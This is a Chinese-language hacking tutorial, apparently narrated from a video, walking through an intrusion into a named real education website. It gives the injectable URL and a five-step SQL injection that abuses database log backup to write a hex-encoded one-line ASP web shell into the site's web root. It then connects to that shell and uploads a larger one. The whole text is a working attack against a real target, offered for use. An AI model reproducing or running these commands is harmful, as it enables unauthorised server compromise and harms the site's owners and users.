今天，有位朋友给了我一个点，说是DB——OWNER的权限，可是却无法备份成功，让我帮他看看
那今天的教程就我们来一起研究下这个站把。。。

http://www.shandongedu.com/qlpx/kyzk/qlpxnr.asp?id=12
这个就是他说的那个注入点，我们先来检测下，是不是真的DB——OWNER的权限。还是用啊D吧。。

呵呵，好快的注入点，DB_OWNER的权限应该没有错，看下他的管理员是不是把权限设置的很变态，浏览下
目录。。。。我的习惯是先浏览E盘，因为有很多的站都把他的根目录放到E盘或D盘。。。我们看下有没有
效果。。。呵呵，被我猜对了，shandongedu这个目录因该就是站点的根目录了，下面就该进入正题了。。

现在DB_OWNER权限下的入侵无非只有一种，就是备分，只要备分成功那你就成功了5成了，说到备分又分
工具备分和手工备分两种，那我们旧先用工具备分下，看有没有可能成功。。。看我操作，用XIAOLU的
NBSI备分。。。。。。

记住备分路径一定要写一个ASP的地址。。。好了。开始备分。。

挺快的，看看成功没，连接下。。。。汗。。。这个页面存在，再重新备分下。。。。
还是很快。。。再看下。。。呵呵，没有成功，怪不得那位朋友说备分成功不了。。。

是不是这样旧没有办法了？当然不是，我们走下一条路，手工备分。。。

手工备分就是用SQL命令添加在漏洞页面后面来执行，以达到我们备分的目的。。。
好了，看我操作。。。先打开漏洞页面。。。。

这个就是了 ，下面我们来备分。。。。

';alter database qledu set RECOVERY FULL--
';create table cmd (a image)--
';backup log qledu to disk = 'e:\cmd' with init--
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
';backup log qledu to disk = 'e:\webroot\shandongedu\1437.asp'--

这些就是备分的命令了，记住库名的地方要写上qledu，这样才可以成功。。

0x3C25657865637574652872657175657374282261222929253EDA这个 是LAKE2的一句话木马16进制后的样子
备分路径那里要写你的一句话木马存放地址,好了，开始备分。。。。。

很慢。。。。如果网页打开后正常，旧说明命令成功了。。。

呵呵，第一步成功。。
第二步。。。。。。OK
第三步。。。。。。OK
第四步。。。。。。这是最关键的要写入木马。。。。没有出错，成功。。。。
第五步。。。。。。应该没有问题了。。。。好了，命令已经执行完了。。。看下我们的木马是不是已经写进去了

呵呵，不出所料，熟悉的样子。。。

那就用客户端连接下，。。先测试下。。。。。。记得密码是a。。。

呵呵，成功了。下面上传大马。。。不好意思。没有准备充分。。。。

记得写你马的路径呀。。。好了。上传。。。

E:\webroot\shandongedu\1234.asp成功了。。。。

下面连接大马。。。。。

呵呵，成功了。。。教程也该结束了。。。。我的QQ75320216

88